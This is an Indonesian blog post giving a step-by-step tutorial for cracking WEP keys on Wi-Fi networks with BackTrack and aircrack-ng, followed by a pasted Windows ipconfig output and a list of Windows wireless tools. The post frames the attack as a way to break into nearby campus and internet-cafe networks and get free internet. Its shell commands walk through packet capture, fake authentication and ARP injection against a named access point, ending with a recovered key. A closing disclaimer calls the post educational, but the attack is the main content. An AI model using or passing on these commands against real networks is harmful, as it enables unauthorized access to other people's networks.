CO.CC:Free Domain

Selasa, Januari 27, 2009

Bagaimana Cara Ngehack WEP 64 – 128 bit Wi-Fi

Tentunya rekan2 sekalian pernah mendengar mengenai WLAN atau Wi-Fi kan? Nah seperti jaringan internet yang ada di kampus tercinta kita, Hampir semua tempat di kampus kita tak luput dari sinyal wifi. Dan juga beberapa daerah di sekitar kampus dalam juga terdapat beberapa wifi seperti yang dimilik oleh beberapa Warnet. Hampir semua wifi yang ditemui di lokasi tersebut menggunakan kunci enkripsi WEP 64 bit, dan departemen ILKOM yang hanya menggunakan enkripsi WPA-PSK. Pada kesempatan ini, sedikit ingin membahas bagaimana seseorang mampu menembus WEP key untuk mendapatkan akses ke dalam jaringan bahkan tidak tertutup kemungkinan untuk menggunakan internet gratis. Mungkin ada yang bertanya, apa itu wep? Dan apa fungsi wep? Apa itu dhcp? Dan lain sebagainya.. tapi kali ini, saya hanya membahas mengenai wep key saja. Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi. Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0. Secara umum langkah-langkahnya adalah sebagai berikut: 1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell. Ketikkan: Ifconfig rausb0 Iwconfig rausb0 2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoring dengan menggunakan shell ketikkan: airodump-ng rausb0 3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah: iwconfig rausb0 mode monitor channel 8 airodump-ng -- channel 8 --ivs -w namafile rausb0 shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng 4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan: Aireplay-ng -1 -30 -e CIPUTIH –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0 Lakukan fake authentification sampai muncul balasan jawaban: Authentification successful Keep live sending packet Lakukan terus sampai mendapatkan key wep pada langkah aircrack-ng 5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command: Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0 Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0 6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan aircrack-ng –e CIPUTIH -b 00:18:f8:36:83:47 (namafile).ivs lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya. Tunggu sampai mendapat display Key Found (B1:92:27:EF:6E) Probability 100% 7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara: iwconfig rausb0 mode managed –e CIPUTIH key B1:92:27:EF:6E lalu lakukan otomatisasi dhcp dengan mengetikkan perintah: dhcpcd rausb0 lalu lakukan ping ke salah satu web site misalnya: ping yahoo.com kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih. Reference: www.remote-exploit.org www.echo.or.id www.netstumbler.org www.aircrack-ng.org www.swik.net www.Securityfocus.com www.wififorum.pl
Hack dengan Windows
dari command prompt, ketik aja: ipconfig /all nanti muncul spt ini: Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\>ipconfig /all Windows 2000 IP Configuration
  • Host Name . . . . . . . . . . . . : Asysyauqi
  • Primary DNS Suffix . . . . . . . :
  • Node Type . . . . . . . . . . . . : Broadcast
  • IP Routing Enabled. . . . . . . . : Yes
  • WINS Proxy Enabled. . . . . . . . : Yes
Ethernet adapter Local Area Connection 2:
  • Media State ............................. : Cable Disconnected
  • Description ............................. : Bluetooth PAN Network Adapter
  • Physical Address .................... : 22-22-22-22-22-22
Ethernet adapter Leuser XY:
  • Connection-specific DNS Suffix . :
  • Description ............................. : VIA Rhine II Fast Ethernet Adapter
  • Physical Address ................... : 00-01-E7-D3-B6-DA
  • DHCP Enabled ....................... : Yes
  • IP Address ............................. : 192.168.101.117
  • Subnet Mask ......................... : 255.255.255.0
  • Default Gateway.................... :
  • DNS Servers .......................... :
Ethernet adapter Wifi XXXr:
  • Connection-specific DNS Suffix . :
  • Description .......................... : RT73 USB Wireless LAN Card #2
  • Physical Address ................ : 00-0E-2E-C1-19-F7
  • DHCP Enabled .................... : No
  • IP Address .......................... : 19.56.6.2
  • Subnet Mask ...................... : 255.255.255.252
  • Default Gateway ................. : 19.56.6.1
  • DNS Servers ........................ : 19.56.6.1
kebetulan itu server yang saya pake... (ni lagi pake server) nah untuk tau chipsetnya ya ini: Ethernet adapter Wifi XXXr: Connection-specific DNS Suffix . :
  • Description .......................... : RT73 USB Wireless LAN Card #2
  • Physical Address ................ : 00-0A-43-D1-19-F9 (MAC addres)
  • DHCP Enabled .................... : No
  • IP Address .......................... : 19.56.6.2
  • Subnet Mask ...................... : 255.255.255.252
  • Default Gateway................. : 19.56.6.1
  • DNS Servers ....................... : 19.56.6.1
semua laptop bisa kok diinstal dengan linux.. klo pake backtrack mungkin ga perlu diinstall soalnya dia itu live cd, jadi bisa nge run dari cd.. tapi ngecrack wep dari windows juga bisa... tapi lebih lama krn cuma passive attacking (dan juga soalnya belum pernah nyoba sih).. kan tools buat ngecrack dari windows juga ada seperti: Airsnort AirCrack WinAirPack AirDump AiroPeekNX EtherPeekNX CommView for Wifi CommView For LAN LinkFerret AirCrack WinAirPack AirDump AiroPeekNX EtherPeekNX CommView for Wifi CommView For LAN LinkFerret Artikel ini hanya untuk menambah pengetahuan kita mengenai keamanan suatu jaringan, penyalahgunaan terhadap tutorial ini bukan merupakan tanggungjawab penulis. Sumber : Asysyauqi

0 komentar: